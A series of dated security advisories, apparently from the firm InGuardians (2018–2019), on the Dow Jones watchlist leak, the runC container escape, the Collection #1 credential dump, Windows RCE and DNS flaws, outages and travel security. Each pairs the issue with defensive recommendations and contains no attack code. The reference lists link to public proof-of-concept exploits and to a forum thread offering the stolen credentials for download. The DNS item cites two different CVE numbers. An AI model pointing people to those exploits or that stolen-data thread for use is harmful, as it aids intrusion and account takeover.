Dow Jones’ watchlist of politicians, high-risk individuals and corporate entities has been exposed after a company with access to the database left it on a server without a password.
This watchlist includes senior political figures (“politically exposed persons,”) their relatives, close associates and companies to which they are linked. It also includes individuals and organizations who have been involved in financial crimes and individuals on terrorist watchlists.It includes not only names, but also Dow Jones’ internal profile notes and PII including date of birth, place of citizenship and photographs. This watchlist, while leaked in file format here, is sold as a product accessible via APIs.

It is important to note that Dow Jones was not hacked in this instance.  A client of theirs, with legitimate access to the data, failed to secure its access to the information. That “weakest link” exposed a large database of sensitive information and negated the security efforts of Dow Jones and every other client paying for access who properly secured their access to the watchlist.

Impact
The overall impact of this breach is unknown at this time, but if this information is used to target high profile persons of interest it may lead to upstream liability for all companies involved. First off, this should trigger an examination of data sharing agreements at Dow Jones and subsequently serve as a lesson for the rest of us.  Next, we need to ask what other data on that server was compromised? What other servers of the Dow Jones client were compromised and what other information was lost? What is that company’s current security posture and in what ways has that been assessed or verified?

The next step is to immediately look at your own companies’ data sharing or subscribing agreements. With what other organizations do you share data? What technical network, software, and procedural safeguards are in place? What contractual language is in place among business entities requiring information security practices? What assurances or auditing mechanisms are in place, both contractually AND in practice? When was the last time such systems were checked? WHO has the report? How is that report guarded?

Recommendations
First, answer the questions above, and more that will come to mind in your own organization. If you are not the ‘go to’ person for any of those questions, get the question to the right place.

We recommend that organizations explicitly review contracts and consider legal issues, in addition to requiring a third-party security assessment and vendor security questionnaire, before data sharing agreements go into effect.

Your business should have a data classification process – what matters most, some, and least? Know what data is sensitive, how sensitive it is, and where that data is stored and shared. Do those access points have logs? In recent engagements, InGuardians has continued to find organizations that are not prepared to detect or log unauthorized access to sensitive systems and data. Review what you log, where logs are stored, log retention policy, and how they are analyzed. A log that is overwritten in 48 hours is unlikely to provide useful info in the event of unauthorized access or to track a compromise and breach.

Additional Resources
Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked (TechCrunch)
https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/ 

Politically Exposed Person (Wikipedia)
https://en.wikipedia.org/wiki/Politically_exposed_person

Dow Jones Risk Screening Watchlist Exposed (Security Discovery blog)
https://securitydiscovery.com/dow-jones-risk-screening-watchlist-exposed-publicly/

Cloud Leak: WSJ Parent Company Dow Jones Exposed Customer Data (UpGuard Blog)
https://www.upguard.com/breaches/cloud-leak-dow-jones

A massive financial crime and terrorism database has leaked (ZDNet, 2016)
https://www.zdnet.com/article/world-check-financial-crime-and-terrorism-database-leaked/ 

InGuardians Events & Resources
LIVE WEBINAR Thursday, March 28 at 12 PM EDT /3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians
Register here:  https://register.gotowebinar.com/register/3676332972988128524

Justin Searle, InGuardians Director of ICS Security will be at SANS ICS Summit in Orlando, Florida.
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools with Justin Searle, our Director of ICS Security at SANS ICS Summit | Mar 18-25 | Orlando, FL.

LIVE WEBINAR on April 18 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.
Register here: https://register.gotowebinar.com/register/8814422277734413068

For all upcoming training and events, please visit: https://www.inguardians.com/training/

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

2/21/19 Container Escape in runC-based technology including Docker and Kubernetes

Issue
Security researchers have discovered a container escape method for many known runC-based containerization technologies, including Docker, Kubernetes, cri-o, and containerd.  Additionally, a slight variant of the exploit code is reported to work on LXC and Apache Mesos.  Amazon Web Services (AWS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Container Service for Kubernetes (Amazon EKS), and AWS Fargate, Google Kubernetes Engine (GKE), Digital Ocean, OpenShift, and other container providers were also affected and are in various states of patching.

In the case of this exploit, an attacker is able to escape from a container and gain full root access to the host. The attacker will then likely access other resources via network, storage and data stored on the host. Given this level of access, the attacker could rewrite any host-based firewall rules as necessary.

Multiple proof of concept (PoC) exploits exist for this vulnerability. One exploit relies on a malicious container deployed in the container infrastructure.  This malicious container can then be used to overwrite the host runC binary with minimal user interaction, ultimately granting root level access to the host operating system. While it may seem that the barrier to entry is the deployment of the malicious container, this is often easily overcome; many administrators fail to properly set permissions for users, allowing them to deploy their own containers at will, or, the administrators are often willing to use the “first available” public container that may already be poisoned by an attacker.

Another exploit can be used in an already-running container, likely by an attacker who compromises the container’s application or is able to start a fresh privileged container on the cluster. It appears that this requires that an administrator or infrastructure component “exec” a command in that container after the exploit has run. In any case, this vulnerability will be exploited.

Impact
Failure to resolve runC vulnerabilities can allow a malicious party to gain root level access to the underlying container host. This root level access grants full permissions to the host operating system, as well as the ability to interact with all of the containers running on the host. To compound the issue, once an attacker has root access to the one host, it can be used as a pivot point into the internal network, with the capability to compromise additional resources.

Recommendations
InGuardians recommendations have several components, depending on the platform in which has been adopted:
All Platforms
◦    Examine runC-created container logs for anomalous activity
◦    Compare the running list of containers to your inventory
Internal cluster
◦    Update runC to the latest version for your supported platform.  See the Additional Resources section for details.
Hosted provider
◦    Amazon:  Amazon has currently provided patches for Amazon Linux, ECS, EKS, and Fargate, many of which need administrator intervention to apply. See the Additional Resources section for details. [4]
◦    Google: Default GKE nodes running Container-Optimized OS have been patched, but Ubuntu nodes must be patched by the user. See the Additional Resources section for details. [3]
◦    Digital Ocean: In an email to Digital Ocean customers, they have informed subscribers that they have patched runC.
◦    OpenShift and others: Contact your provider or review their vulnerability tracking information for the status of patches.
•    Other projects (Apache Mesos, LXC, etc)
◦    Contact the project for status of the patches, as no public information has been posted at the time of this writing.
Overall recommendations
◦    Develop or amend a robust patching strategy to specifically address containerization infrastructure.
◦    Implement the Principle of Least Privilege for your container service of choice, preventing deployment of new containers except by select users that have business need to do so.
◦    Deploy additional configuration, depending on platform, preventing runC from being executed at root (UID 0), using a lower privilege user. [2]
◦    Develop and deploy a robust AppArmor or SELinux profile to detect and prevent runC overwrites
◦    Use Pod Security Policies to enforce best practices, including requirements for unprivileged containers and AppArmor/SELinux/Seccomp profiles
◦    Upon deployment of new containers, provide a vetting mechanism for the selected public containers to ensure they do not contain additional, unwanted exploit code.  Alternatively, do not rely on public container images, and create them in house with known good code and applications.

Additional Resources
[1] CVE-2019-5736: runc container breakout (all versions)
https://seclists.org/oss-sec/2019/q1/119    

[2] Kubernetes Blog: Runc and CVE-2019-5736
https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/
[3] Google Cloud runC Security Bulletin
https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc
[4] AWS runC Security Bulletin
https://aws.amazon.com/security/security-bulletins/AWS-2019-002/
[5] ZDnet: Doomsday Docker security hole uncovered
https://www.zdnet.com/article/doomsday-docker-security-hole-uncovered/
[6] Nick Frichette’s Proof of Concept Exploit for CVE-2019-5736
https://github.com/Frichetten/CVE-2019-5736-PoC
[7] Exploit-DB Exploit 46369 for CVE-2019-5736
https://www.exploit-db.com/exploits/46369

InGuardians Events & Resources
LIVE WEBINAR Thursday Feb 21 12PM PST | 3PM EST
 
Our Senior Security Consultant Adam Crompton @3nc0d3r is dropping a new set of tools for #RedTeam operations. Demo-heavy webinar… you don’t  want to miss! 

Register here: https://attendee.gotowebinar.com/register/8395114722323637259

For all of our upcoming webinars, please visit: https://www.inguardians.com/webinars/

Adam will join our CTO Jay Beale on the RSA stage for “Hacking and Hardening Kubernetes”. This talk will demonstrate attacks on Kubernetes clusters, then demonstrate the  defenses that defeat those attacks.

More about this talk: https://www.inguardians.com/events/

1/31/19 Managing security, risk, and insecurity

Issue
There have been several massive database breaches, application vulnerabilities, and many new exploits, and it’s only a month into the new year. Some of them are technical exploits and some have been procedural, like storing aggregate identity or authentication information.

Impact
System security is not the primary job for most organizations, but an aspect of providing some other goods or services. The core or primary business functions need to be supported by your data systems – they need to work. They should also be efficiently controlled and, of course, that’s why there are applications & programs in place to enable effective management. However, no one can know the inner workings of all of your applications. What can a manager do to reduce risk and exposure? Here is a short list to help manage insecurity.

Recommendations

  • Inventory all of the operating systems and applications on the network.
    • If there are separate segments or networks, know which apps are where, especially on any external or internet facing networks.
    • Include which version or build numbers are installed, along with the latest patch number.
    • IT/Security should provide regular updates and know when new exploits impact installed apps.
  • Review and enforce identity/credential management policies.
    • Require multi-factor authentication.
    • Require aperiodic changes – not all at once, and not always on first of the month.
    • Use password management software.
  • Test vulnerability and patch management process
    • Know what public vulnerabilities and patches exist for each of your OSs & Apps.
    • Know what the patch testing and deployment process are.
    • Know how to determine which patches are critical.
  • Inventory and classify data
    • Identify sensitive and compartmentalized information
    • Require specific handling procedures with each level of information classification.
    • Clearly, label data with its information classification
    • Securely store and compartmentalize sensitive and/or confidential information
  • Conduct system logging and log analysis.
    • Log critical and important events on sensitive systems and networks.
    • Sign and store logs for analysis and retention.
    • Histogram outgoing traffic – categorize known destinations, flag outliers.
    • Conduct log review and analysis of critical and important systems in order to identify areas of improvement in performance, availability, and security.
  • Maintain and analyze network and application controls
    • Tune firewalls/IPS/IDS to deter and detect exfiltration
    • Apply targeted rule sets tailored to the security level of each network segments
    • Analyze the security logs looking for performance hits, operational, business, and security-related events.

 

Remember, because we do not and cannot know what the next exploit is in advance, we are really managing levels of insecurity. As I was writing this, two new issues popped up: Apple’s FaceTime can eavesdrop before you actually connect, and Google is apparently systematically broadcasting sensitive browsing and personal information to third party advertisers. One could be listening in on a board meeting, the other could be revealing someone’s searches for particular grades of aluminum or certain electronic chips. Both could be sources of business intelligence.

A senior manager should be able to ask to see the results of a log review and not have to wait for it to happen – someone should have one for that week or day and be able to give a SHORT precis.  Simply asking the question, and then watching averted eyes and feet shuffling, may tell you all you need to know.

Take that response and shape behaviors, not by barking, but by clearly laying out what’s needed to keep up with events.

Additional Resources

“Apple to fix FaceTime bug that allows eavesdropping” – Washington Post

https://www.washingtonpost.com/business/technology/apple-turns-off-group-facetime-amid-reports-of-bug/2019/01/29/9d5f73a2-23bb-11e9-b5b4-1d18dfb7b084_story.html

Google and IAB ad category lists show ‘massive leakage of highly intimate data,’ GDPR complaint claims

https://techcrunch.com/2019/01/27/google-and-iab-ad-category-lists-show-massive-leakage-of-highly-intimate-data-gdpr-complaint-claims/

Data management giant Rubrik leaked a massive database of client data
https://techcrunch.com/2019/01/29/rubrik-data-leak/

InGuardians Events & Resources

Our next webinar “All of Your Copy/Paste Belongs to US” goes live in February. Stay tuned for dates and registration links  by visiting https://www.inguardians.com/webinars/ or following @InGuardians on Twitter

Black Hat USA 2019 registration is open!

Jay Beale, our CTO is teaching “PURPLE TEAM VIEW: ATTACKING AND DEFENDING LINUX, DOCKER, AND KUBERNETES”
Register here:

https://www.blackhat.com/us-19/training/schedule/#a-purple-team-view—attacking-and-defending-linux-docker-and-kubernetes-14309

Justin Searle, our Director of ICS Security is teaching ” ASSESSING AND EXPLOITING CONTROL SYSTEMS & IIOT”

Register here:

https://www.blackhat.com/us-19/training/schedule/#assessing-and-exploiting-control-systems–iiot-14015

1/23/19 Over 1TB of Stolen Account Usernames and Passwords Made Available Publicly Last Week

Issue
A collection of over one terabyte of user data with names and passwords has been released. The passwords are allegedly from more than 2,000 compromised sites, though some or many of the site compromises may have occurred more than a year ago. As such, the collected passwords may not be current for the sites from which they were stolen. Given many people’s re-use of passwords, however, those passwords may be useful on entirely different sites.

Said to be a portion of a larger collection, this collection (also referred to as a “data dump”) has been referred to as “Collection #1”. “Collection #1” is comprised of over 2.7 billion records and 773 million unique email addresses. Unfortunately, this represents only a small portion of the full collection currently being distributed on many DarkWeb and Hacking Forums. The full collection, which is made up of “Collection #1-5 and Latest Anti-Public & Zabagur #1,” is a cloud-stored repository that contains over 1TB of data and is being sold on hacker forums.

The real problem and question is, “where did this dump come from and which companies were affected and are unaware?” Troy Hunt, the primary security researcher behind HaveIBeenPwnd and the Pwned Password checking sites, released a post documenting his analysis and ingestion of the email addresses and passwords he obtained from “Collection #1.” Mr. Hunt has come up with a plan for notifying users that use his service or vendors such as 1Password’s Watchtower, which has an integrated compromised-site checking feature, to check against the lists at HaveIBeenPwnd.com to alert users of compromised accounts and credentials.

Mr. Hunt stated that this ingestion represented 140 million new email addresses that haveibeenpwned had not yet seen and therefore were not part of other publicly-released data breaches. These credentials are typically used by attackers to obtain access to services or applications. Attackers use the credentials from this type of data breach, testing them against many different websites, gaining access on a portion of those sites. This type of attack is commonly called “credential stuffing”, and presents a risk that many users do not often consider.

Impact
If your users are still using any of the passwords contained in this collection, attackers may use those same passwords, gaining access to both company and personal resources, such as e-mail, banking, document storage, and remote access.  The greatest impact stems from the difficulty that people have in managing large numbers of unique passwords. Many will use the same or similar passwords on multiple sites/services. Attackers will use variations of these passwords, including, but not limited to, incrementing numbers, years, or mixing in character/digit replacements.

Recommendations

  • Ensure all employees use multi-factor authentication for all company resources.
  • Check if both company and personal email addresses are within the public breach information, including but not limited to, HaveIBeenPwnd.com.
  • Use a mass password changing service to generate unique passwords and change all your current passwords to newer, stronger and differing passwords.
  • Never use the same password on multiple sites.
  • Never use common or easily guessable patterns for passwords: (season-year, incrementing, etc)
  • Enable two factor authentication, such as TOTP or third party services, like those available from DUO, for all services that support it and contain any sensitive or personal information.
  • Sign up for monitoring services that watch for this type of information or use a tool such as WatchTower integrated into 1Password’s password manager to watch for compromised accounts.

Additional Resources
“The 773 Million Record “Collection #1” Data Breach” (Troy Hunt’s blog)
https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/

Post: Collection 1 through 5, Anti-Public, Zabagur #1  Post (Raidforums)
https://raidforums.com/Thread-Collection-1-5-Zabagur-AntiPublic-Latest-120GB-1TB-TOTAL-Leaked-Download

“HaveIBeenPwned” Compromised Account Search Service
https://haveibeenpwned.com/

“Pwned Passwords” Compromised Password Search Service
https://haveibeenpwned.com/Passwords

“Credential Stuffing” (Wikipedia)
https://en.wikipedia.org/wiki/Credential_stuffing

“Credential Stuffing” (OWASP)
https://www.owasp.org/index.php/Credential_stuffing

InGuardians Events & Resources

Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll examine a few interesting software packages (with demos) to begin your exploration of the RF spectrum.  You’ll also discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.

https://attendee.gotowebinar.com/register/2756488141619406860

For future webinars, please visit:

https://www.inguardians.com/webinars/

 

InGuardians friends in Florida!  David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class:

Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.

  • Over 30 hands-on labs
  • Comprehensive coverage of tools
  • Real world tips from the experts
  • CTF Challenge 

SEC560 is a must for every security professional!

 

Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

Dive deep into SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques with hands-on training from Justin Searle, our Director of ICS Security at SANS Secure Japan Mon, February 25 – Sat, March 2, 2019

 

https://www.sans.org/event/secure-japan-2019/course/advanced-web-app-penetration-testing-ethical-hacking

For more events and future training schedule, please visit https://www.inguardians.com/training/

1/14/19 Microsoft patches multiple remote code execution vulnerabilities

Issue
On January 8th, 2019 Microsoft released a patch for Windows that includes fixes for multiple instances of Remote Code Execution (RCE). One instance of Remote Code Execution affected DHCP. To exploit this vulnerability an attacker must craft and send a special DHCP request, which would allow them to execute to arbitrary code in the SYSTEM context. The Jet Database also has multiple issues with RCE. Specifically, it improperly handles memory in a way that permits execution of arbitrary code under the SYSTEM context. There were also a couple of instances of RCE inside of Hyper-V which allow a malicious application running on the guest OS to access the host OS. Finally, there is an RCE vulnerability in Exchange which, if triggered by a malicious email, can then permit arbitrary code execution in the SYSTEM context.

Impact
With multiple instances of Remote Code Execution in the first patch of 2019 but no “publicly” available proof of concepts at this time, InGuardians currently rates the impact as Medium. While exploits are not publicly available yet, it remains unknown if malicious actors have access to exploits and are actively using them.  Should such exploits become publicly available, the impact of this issue could easily move rapidly into the Critical range, particularly given the size of Microsoft Exchange’s enterprise user base.

Recommendations
Given the severity of these security patches, InGuardians recommends that you evaluate and push these patches to production environments posthaste.  In addition, apply any relevant IPS and IDS signatures, and monitor for triggering.

Additional Resources
“CVE-2019-0579 Details” (Mitre)

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0579

“CVE-2019-0547 Details” (Mitre)

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0547

“CVE-2019-0550 Details” (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0550

“CVE-2019-0551 Details” (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0551

“CVE-2019-0586 Details” (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0586

InGuardians Events & Resources
Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll examine a few interesting software packages (with demos) to begin your exploration of the RF spectrum.  You’ll also discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.
https://attendee.gotowebinar.com/register/2756488141619406860

For future webinars, please visit:
https://www.inguardians.com/webinars/

InGuardians friends in Florida!  David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class:
Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.
• Over 30 hands-on labs
    •Comprehensive coverage of tools
     •Real-world tips from the experts
     •CTF Challenge 

SEC560 is a must for every security professional!

Reserve your spot now!
https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

For more events and future training schedule, please visit https://www.inguardians.com/training/

1/2/19 Failures in Delivery: CenturyLink, Tribune Publishing and the L.A. Times’ End of Year Problems

Issue
Two different events at the end of December 2018, reveal previously unrecognized gaps in business continuity planning. CenturyLink, a major telecom provider also responsible for  managing critical 911 systems, experienced a nationwide outage. In addition to the heavy impact on emergency services, the disruption to their core business caused many consumers to cancel, reschedule, or conduct business and personal calls with out-of-band solutions, such as Signal and Slack.

A few days later, Tribune Publishing fell victim to a targeted malware attack that prevented or delayed publishing of several large newspapers across the United States.  Tribune is the the publisher of several large newspapers, including the Baltimore Sun, The Chicago Tribune, and the West Coast distribution of the Wall Street Journal and NY Times, all tied with the Olympic printing plant in downtown Los Angeles.

Impact
Two different information technology issues in two different companies threatened the business continuity of many companies nationwide.

First, a single telecom provider’s disruption rippled across business and public services, preventing operations, including that of some vital 911 emergency phone services. The outage continued for more than two days and, according to a document recovered by reporter Brian Krebs, was caused by a single bad network or network management card.  FCC Chairman Ajit Pai acknowledged that the 911 service disruption will be subject to federal inquiry, saying, “I’ve directed the Public Safety and Homeland Security Bureau to immediately launch an investigation into the cause and impact of this outage.”

Second, a malware attack targeted newspapers in widely separated markets. Investigations are ongoing. The LA Times reports that the malware responsible was a variant of “Ryuk”.  This malware was highlighted specifically by the Department of Health and Human Services’ cybersecurity task force in an August advisory. However, the LA Times, also a victim, is no longer a Tribune company. It raises questions about both monoculture vulnerability and network connectivity. Challenges of merging networks from acquired companies, and among a parent firm with multiple separate entities, can leave many security gaps. Domain and Forest trusts can leave paths open for malware to spread well beyond the initial point of compromise.

Recommendations
Because modern business is often so heavily interconnected, the systems that they rely on are also increasingly interconnected. Too often these layers and branches merge together and grow out of expedience, with limited review of the security risk presented. InGuardians recommends that organizations identify all layers in their business continuity plans. It is no longer enough to simply know who your providers are, you should also know who theirs are. Review previous Merger & Acquisition network information for single points of failure. Look for secondary or backup network connections and verify that they are, in fact, separate. Review network permissions with both parent and partner organizations. Confirm which firewalls are in place and determine if the rule sets are up to date and able to prevent the spread of malware from a “trusted” connection. It is also important to remember that, when it comes to business continuity planning, especially for critical systems, sometimes legacy systems and processes are themselves a good fallback plan. In one case in Boston, people were unable to call 911 to report a fire. Instead of calling 911, they used a fire ‘call box’ to get firefighters on scene. Boston Fire remarked that the ‘call box’ system has been successfully operating since 1852. InGuardians reminds you to review your business continuity plans early in 2019, keeping in mind that not all business continuity failures are caused by software problems.

Additional Resources
“Communications outage disrupts 911 service in parts of the country” (CNN)
https://www.cnn.com/2018/12/28/us/centurylink-outage-911-calls/index.html 

“FCC launches probe of CenturyLink in wake of nationwide 911 outage” (NBC News)
https://www.nbcnews.com/news/us-news/fcc-launches-probe-centurylink-wake-nationwide-911-outage-n952681 

Brian Krebs’ disclosure of CenturyLink’s “Event Conclusion Summary” (Twitter)
https://twitter.com/briankrebs/status/1079135599309791235

“Malware attack disrupts delivery of L.A. Times and Tribune papers across the U.S.“  (LA Times)
https://www.latimes.com/local/lanow/la-me-ln-times-delivery-breakdown-20181229-story.html 

“Ransomware suspected in cyberattack that crippled major US newspapers“ (ZDNet)
https://www.zdnet.com/article/ransomware-suspected-in-cyberattack-that-crippled-major-us-newspapers/ 

“Identifying, understanding, and analyzing critical infrastructure interdependencies” (IEEE Control Systems, 2002)
https://www.researchgate.net/publication/3206740_Identifying_understanding_and_analyzing_critical_infrastructure_interdependencies

InGuardians Events & Resources
David Mayer, Senior Security Consultant, will be leading a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!
https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

Enjoyed KringleCon? We did too! If you haven’t had the chance to check out InGuardians talks, you can do so here:
Mike Poor on PCAPs for fun and profit:
https://www.inguardians.com/2018/12/27/pcap-for-fun-and-profit/

Larry Pesce on SDR:
https://www.inguardians.com/2018/12/27/software-defined-radio-the-new-awesome/

Jay Beale on Kubernetes:
https://www.inguardians.com/2018/12/27/quick-intro-attacking-a-kubernetes-cluster/

For more events and future training schedule, please visit
https://www.inguardians.com/training/

12/18/2018 Critical Windows DNS Server Heap Overflow Vulnerability

Issue
Microsoft has released patches for a remote code execution vulnerability (RCE), though a heap overflow condition described by CVE-2018-8540. Unfortunately, this critical issue has not been the subject of much discussion and has largely flown under the radar. Due to the critical nature of DNS in enterprise networks in order to maintain proper function of Active Directory environments and access to critical internal and Internet based resources, this issue should be addressed immediately.  Additionally, the requirement for Microsoft DNS services to be implemented on a Domain Controller, make this issue even more critical to address, due to the sensitive contents of Active Directory.

Impact
While there is no publicly available exploit code available at the time of this writing, it is strictly a matter of time before there is. Given the nature of this attack, in that only a specifically crafted DNS request needs to be sent to an vulnerable server, it is expected that the window for Proof-of-Concept code availability to be short. Should exploit code become available in the near future, it’s impact could be disastrous in an unpatched environment.

If an attacker were to gain control of Windows DNS servers servicing a corporate network the problems are several fold. A successful attacker could:

•    modify DNS records in the domain to redirect authentication attempts against a rogue Domain Controller, in order to harvest credentials;

•    modify DNS records in an erroneous fashion to perform denial of service attacks, affecting Active Directory or other application for complete and total communications failures;

•    use the compromised DNS server as a highly privileged pivot point, with a high degree of success in complete compromise of the entire Active Directory infrastructure.

Recommendations
Due to the possible impact of a DNS server compromise it is critical for organizations to get ahead of public exploit code release. InGuardians recommends that organizations apply the appropriate patches as recommended by Microsoft immediately.

Additionally, with the criticality and impact of this specific exploit condition, it is a good time for organizations to review and revise their overall patching strategy and timelines.  Many organizations take a hybridized rolling approach to applying patches to critical systems in order to minimize downtime.  In these cases, critical components of the infrastructure may be left unpatched for extended periods, often 3 months or more.  Instead of relying purely on metrics, we recommend including human intelligence in this process in order to adjust patching timelines based on real-world impact.

Additional Resources
Microsoft CVE-2018-8626 security Guidance:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8626

December patch Tuesday narrative:
https://www.theregister.co.uk/2018/12/12/december_patch_tuesday/

ZDI December patch Tuesday narrative:
https://www.thezdi.com/blog/2018/12/11/the-december-2018-security-update-review

InGuardians Events & Resources
InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

12/12/2018 Data Security for International Travel

Issue
While traveling to the UK recently, the CEO of a small US company involved in legal action against Facebook was allegedly compelled to divulge information to the British Parliament, in violation of a US court order. [1]  The information had been obtained during the US case’s discovery phase. This started a discussion on the circumstances surrounding it. Could a Member of Parliament really order someone to turn over documents without going through the US courts? Why would the CEO take that information with him? What could he have done to protect the information?

While the truth of the story turned out to be different [2], the questions are still valid, especially when it comes to who can compel disclosure of data. Sometimes, rare and arcane options exist that even experienced legal minds don’t know about or fully understand. By the nature of their position, CEOs and other executives necessarily have access to sensitive information about strategic, operational, planning, and legal matters. This information is often carried with them on, or accessible through, their notebook computers and other electronic devices. Travel to foreign nations thus opens that information to new risks.

Even traveling to a “friendly” foreign nation involves entering into a new legal regime that may be entirely unfamiliar, with an entirely different set of rights and consequences. Countries that are geopolitically friendly might still have minor differences with one another. One country might attempt to seize evidence to gain an advantage in negotiations. It’s not just formal procedures to worry about: Evil Maid Attacks, where someone gains access to a hotel room to surreptitiously access electronic devices, truly occur with varying degrees of sophistication.[3]

Modern technologies provide enormous mobility benefits. Notebooks, tablets, and phones are smaller; storage technologies like solid state drives (SSDs) are light and fast; and virtual private networks (VPNs) allow connectivity to corporate networks from around the world. But these technologies can also add risk: the devices are integrated into our lives so we’re loathe to leave them behind; SSDs work differently than traditional hard drives, making full erasure impossible to verify; finally, some nations have strict laws around VPNs ranging from registered use to outright bans. The desire to keep the familiar when in an unfamiliar place can drastically increase the risk involved.

Impact
Seizure of devices can result in effects ranging from data availability to data theft via forensic data recovery to addition of malicious code. While loss of control of sensitive data can be extremely serious, bringing back malicious code–especially code developed and installed by a nation-state–can be catastrophic not just to your company but to your partners, vendors, and customers. Foreign intelligence agencies often attempt to penetrate government systems through contractors. This kind of malware is often extremely difficult to identify and may exist for years before detection, with potentially enormous cleanup costs and possible loss of current and future business.

Recommendations
The number of factors going into modern travel concerns has become dizzying. Aside from general concerns for ensuring the security of data at rest and in motion, political and international factors may weigh in and change on a moment’s notice. Technical considerations for evolving computing environments also play a significant role. All of what follows is subject to company-specific risk analysis. Many variables factor into this: presence of one’s company in the destination country, who the traveler is meeting, recent domestic and international incidents, and even the traveler’s social media posts and interactions. The recommendations are therefore based on travel to high-risk countries and may not be as necessary for a trip to lower-risk nations. When traveling to a foreign country, InGuardians recommends leaving your normal devices at home. Bring devices used only for travel purposes, minimizing the number of devices to ideally just a notebook and phone. Be aware of laws of and relationships between starting, layover, and destination countries. If you’re under suspicion, the intermediate airport(s) can search you and your belongings in most cases. Bear in mind that countries can change course incredibly quickly. When crises happen such as terrorist attacks, international conflict, or political turmoil, many countries can become much more aggressive in their scrutiny. Notebooks should be configured to have the absolute minimum required software, be fully patched (including any firmware, drivers, and third-party programs), use whole-disk encryption, and probably have additional lock-downs that may not be used in normal deployments. Users should not be able to install software and the notebook should not be attached to an Active Directory domain. All email and web activities should be performed through a combination of a very strong VPN with multi-factor authentication and either web or RDP access, only to data expressly needed for the trip; no email client (including Outlook) should be installed locally to avoid the temptation to set it up. Users should know how to verify a proper VPN connection, including validating certificates; don’t underestimate the value of paper in providing the necessary validation information. Users should connect to only trusted networks, which in many cases will consist of only their phone’s WiFi (watch out for data costs–streaming Netflix is probably a bad idea). For the phone, get a recent model that actively gets manufacturer/carrier updates and a new number for international travel. Additional consideration should be given for phone models that store password information in hardware security modules (HSMs) for resistance to password recovery attacks. Encrypt the phone and require a long password, disallowing numeric PINs. Put no personal data on it: it’s just for Internet and phone calls. Require that IT create a new iTunes or Google identity for which the traveler will not have the password to prevent installation of apps. Scrap the account after travel. Corporate email should be accessed through the phone’s browser, ideally over the same VPN the notebook uses. This means manually checking and not relying on notifications. No device should ever leave your side: take them to meetings, meals, and wherever else you go, and do not let them out of your sight (another reason for minimizing the number of devices). Consider any seized or missing device to be compromised and avoid using it at all. In a worst-case scenario, you should be ready to destroy not just a drive but an entire notebook and all other devices if there is reasonable suspicion of compromise. At a minimum, if you’re planning to replace instead of destroy a device, the motherboard firmware should be re-flashed and reset using a variant obtained and cryptographically checked before the trip occurs. You also must be willing to walk away from the hardware and possibly accept refusal of entry to the country (which can itself have cascading effects for future entry to that and other nations).

Additional Resources
[1] Ryan Browne, “Facebook documents seized by UK parliament ahead of a crucial hearing,” CNBC, Nov 27, 2018, https://www.cnbc.com/2018/11/26/facebook-documents-seized-by-uk-parliament-ahead-of-a-crucial-hearing.html
[2] “Six4Three Exec Ordered to Surrender Laptop after Facebook Leak,” Fortune, Dec 1, 2018, http://fortune.com/2018/12/01/facebook-leak-six4three/
[3] Christopher Boyd, “Leaving Laptops in Hotel Rooms: A Bad Idea,” Malwarebytes Labs, Oct 28, 2015, revised Mar 30, 2016, https://blog.malwarebytes.com/cybercrime/2015/10/leaving-laptops-in-hotel-rooms-a-bad-idea/

InGuardians Events & Resources
We are happy to announce that David Mayer, Senior Security Consultant, will be leading  a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!
https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

Justin Searle, our Director of ICS Security is in DC this week, teaching his ICS410: ICS/SCADA Security Essentials at SANS Cyber Defense Initiative
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials 

